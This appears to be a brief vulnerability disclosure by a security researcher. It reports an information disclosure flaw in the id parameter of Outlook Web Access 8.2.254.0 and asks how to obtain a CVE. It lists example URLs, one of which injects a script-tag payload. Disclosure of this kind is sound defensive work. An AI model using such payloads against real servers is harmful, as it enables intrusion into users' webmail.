$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "Microsoft Outlook Web Access (OWA) version 8.2.254.0" OS: Windows Server 2003 Internet Explorer 7 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ There is an information disclosure vulnerability in "Microsoft Outlook Web Access (OWA) version 8.2.254.0". The issue is with the id parameter. Following are different exploitation techniques: https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script> https://example.com/owa/?ae=Folder&t=IPF.Note&id= https://example.com/owa/?ae=Folder&t=IPF.Note&id=A Whom to contact to get a CVE Identifier for this vulnerability. Best Regards, Praveen Darshanam, Security Researcher, INDIA
